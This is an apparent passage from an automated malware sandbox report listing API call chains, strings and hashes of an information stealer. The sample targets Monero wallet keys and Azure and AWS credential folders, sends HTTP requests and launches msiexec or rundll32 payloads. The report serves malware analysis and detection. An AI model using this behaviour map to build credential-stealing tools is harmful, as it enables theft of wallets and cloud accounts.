                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: faf6d1064001599edbcf642de9054f2717972666b095ad02720af17092d2096a
                                • Instruction ID: 714366278f1c40ebf818d398391a5ec6fc7160e6538b47f1cc1d4c7fbe2d8604
                                • Opcode Fuzzy Hash: faf6d1064001599edbcf642de9054f2717972666b095ad02720af17092d2096a
                                • Instruction Fuzzy Hash: D312F071920128ABDF15EBA0DC95FEEB378BF15700F504199F10A66092EF702E49DFA6
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D0E0B0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0008D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0008D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D208
                                • lstrcat.KERNEL32(?,000A1478), ref: 0008D217
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D22A
                                • lstrcat.KERNEL32(?,000A147C), ref: 0008D239
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D24C
                                • lstrcat.KERNEL32(?,000A1480), ref: 0008D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D26E
                                • lstrcat.KERNEL32(?,000A1484), ref: 0008D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D290
                                • lstrcat.KERNEL32(?,000A1488), ref: 0008D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D2B2
                                • lstrcat.KERNEL32(?,000A148C), ref: 0008D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D2D4
                                • lstrcat.KERNEL32(?,000A1490), ref: 0008D2E3
                                  • Part of subcall function 0009A820: lstrlen.KERNEL32(00084F05,?,?,00084F05,000A0DDE), ref: 0009A82B
                                  • Part of subcall function 0009A820: lstrcpy.KERNEL32(000A0DDE,00000000), ref: 0009A885
                                • lstrlen.KERNEL32(?), ref: 0008D32A
                                • lstrlen.KERNEL32(?), ref: 0008D339
                                  • Part of subcall function 0009AA70: StrCmpCA.SHLWAPI(00D08BA0,0008A7A7,?,0008A7A7,00D08BA0), ref: 0009AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 0008D3B4
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 9964d2c992b8860c7fcd0cc36fc879bcd292464d8a692983f351dbfa60b668cf
                                • Instruction ID: f89de1bb56450c764b7f47e0469d67eabcd0712c4ca22911efd14a61c52b4183
                                • Opcode Fuzzy Hash: 9964d2c992b8860c7fcd0cc36fc879bcd292464d8a692983f351dbfa60b668cf
                                • Instruction Fuzzy Hash: ADE10071A10118ABCF04FBA0ED9AEEE7378BF15305F104159F507A6092DF35AE09DBA6
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00D0D100,00000000,?,000A144C,00000000,?,?), ref: 0008CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0008CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0008CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0008CAD9
                                • StrStrA.SHLWAPI(?,00D0D130,000A0B52), ref: 0008CAF7
                                • StrStrA.SHLWAPI(00000000,00D0D310), ref: 0008CB1E
                                • StrStrA.SHLWAPI(?,00D0DC48,00000000,?,000A1458,00000000,?,00000000,00000000,?,00D08B90,00000000,?,000A1454,00000000,?), ref: 0008CCA2
                                • StrStrA.SHLWAPI(00000000,00D0DFA8), ref: 0008CCB9
                                  • Part of subcall function 0008C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0008C871
                                  • Part of subcall function 0008C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0008C87C
                                • StrStrA.SHLWAPI(?,00D0DFA8,00000000,?,000A145C,00000000,?,00000000,00D08C20), ref: 0008CD5A
                                • StrStrA.SHLWAPI(00000000,00D08A60), ref: 0008CD71
                                  • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B46), ref: 0008C943
                                  • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B47), ref: 0008C957
                                  • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B4E), ref: 0008C978
                                • lstrlen.KERNEL32(00000000), ref: 0008CE44
                                • CloseHandle.KERNEL32(00000000), ref: 0008CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: ff73c85a301088a0c9d17bef5a10061eaaa6ad89371addadc769eb1073fbf501
                                • Instruction ID: 626de513e33d690be341d73d10f2f4660a6e414ec487aa66be32ac60f9d30a60
                                • Opcode Fuzzy Hash: ff73c85a301088a0c9d17bef5a10061eaaa6ad89371addadc769eb1073fbf501
                                • Instruction Fuzzy Hash: 08E1FD71A10118ABDF14EBA4EC96FEFB778BF15304F404159F10667192EF306A4ADBA2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • RegOpenKeyExA.ADVAPI32(00000000,00D0B550,00000000,00020019,00000000,000A05B6), ref: 000983A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00098426
                                • wsprintfA.USER32 ref: 00098459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0009847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0009848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00098499
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 79a3144cd659da5532454cc30e5b4d294da1fab59bcef9757c56aec5c9eb5717
                                • Instruction ID: b30e5b9cca1dc3f8279136f65e1e3d3c2f3298e61c6bf0c68195291e9900eca7
                                • Opcode Fuzzy Hash: 79a3144cd659da5532454cc30e5b4d294da1fab59bcef9757c56aec5c9eb5717
                                • Instruction Fuzzy Hash: 4F81097191012CABDF24DB60DD95FEAB7B8BF09704F008299E109A6181DF716B89DFE1
                                APIs
                                  • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00094DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00094DCD
                                  • Part of subcall function 00094910: wsprintfA.USER32 ref: 0009492C
                                  • Part of subcall function 00094910: FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                • lstrcat.KERNEL32(?,00000000), ref: 00094E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00094E59
                                  • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                  • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                  • Part of subcall function 00094910: FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                  • Part of subcall function 00094910: FindClose.KERNEL32(000000FF), ref: 00094B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00094EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00094EE5
                                  • Part of subcall function 00094910: wsprintfA.USER32 ref: 000949B0
                                  • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A08D2), ref: 000949C5
                                  • Part of subcall function 00094910: wsprintfA.USER32 ref: 000949E2
                                  • Part of subcall function 00094910: PathMatchSpecA.SHLWAPI(?,?), ref: 00094A1E
                                  • Part of subcall function 00094910: lstrcat.KERNEL32(?,00D0F348), ref: 00094A4A
                                  • Part of subcall function 00094910: lstrcat.KERNEL32(?,000A0FF8), ref: 00094A5C
                                  • Part of subcall function 00094910: lstrcat.KERNEL32(?,?), ref: 00094A70
                                  • Part of subcall function 00094910: lstrcat.KERNEL32(?,000A0FFC), ref: 00094A82
                                  • Part of subcall function 00094910: lstrcat.KERNEL32(?,?), ref: 00094A96
                                  • Part of subcall function 00094910: CopyFileA.KERNEL32(?,?,00000001), ref: 00094AAC
                                  • Part of subcall function 00094910: DeleteFileA.KERNEL32(?), ref: 00094B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 9d61ede0bbc3add9b2c5b57e6d487ce36ca3e33fe17a992f3bc8ff096abd718f
                                • Instruction ID: 0953c9f445540c8555ce7db946bf91ca451748038c698ca20f24bf2a279a20c2
                                • Opcode Fuzzy Hash: 9d61ede0bbc3add9b2c5b57e6d487ce36ca3e33fe17a992f3bc8ff096abd718f
                                • Instruction Fuzzy Hash: DE41867A94020867DB50F7B0EC4BFEE7738AB65704F0045547689AA0C2EEF45BC9DB92
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0009906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 8605a3544961c51f9712491762c16dd7805ae08552c0806fa01d0f56682a012d
                                • Instruction ID: 19490ac2f9758468b87c934930cb18bf1ff2a3f4f9da5ac8137e6cb047c38a60
                                • Opcode Fuzzy Hash: 8605a3544961c51f9712491762c16dd7805ae08552c0806fa01d0f56682a012d
                                • Instruction Fuzzy Hash: A671CA75A10208EBDF14EBE4EC89FEEB7B9BF48704F108508F515A7290DB35A905DB61
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 000931C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 0009335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 000934EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: cddfba62dc638f1565a8cc61a7838f963549634af5821fbddc17730351c2f522
                                • Instruction ID: 5fc5229e17d6dad0c005e502d56c18b656ceee13835ee0d58fcdb392329c72e9
                                • Opcode Fuzzy Hash: cddfba62dc638f1565a8cc61a7838f963549634af5821fbddc17730351c2f522
                                • Instruction Fuzzy Hash: 32121C71910118AADF19FBA0DC92FEEB778AF15300F504169F50666192EF342B4EDFA2
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 00086280: InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                  • Part of subcall function 00086280: StrCmpCA.SHLWAPI(?,00D0F398), ref: 00086303
                                  • Part of subcall function 00086280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                  • Part of subcall function 00086280: HttpOpenRequestA.WININET(00000000,GET,?,00D0EDF8,00000000,00000000,00400100,00000000), ref: 00086385
                                  • Part of subcall function 00086280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                  • Part of subcall function 00086280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095318
                                • lstrlen.KERNEL32(00000000), ref: 0009532F
                                  • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00095364
                                • lstrlen.KERNEL32(00000000), ref: 00095383
                                • lstrlen.KERNEL32(00000000), ref: 000953AE
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: a6eeea0782c8a35875427f158f3937a29565f8c82e176cf8840762f7d1de66af
                                • Instruction ID: 521ff6382330c34a2cfff53f29621142d11eb519d8e86c115e64fd741acc8457
                                • Opcode Fuzzy Hash: a6eeea0782c8a35875427f158f3937a29565f8c82e176cf8840762f7d1de66af
                                • Instruction Fuzzy Hash: 8951DC30A20148DBCF14FF64DD96EEE7779AF11341F504018E50A5A593DF346B4AEBA2
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
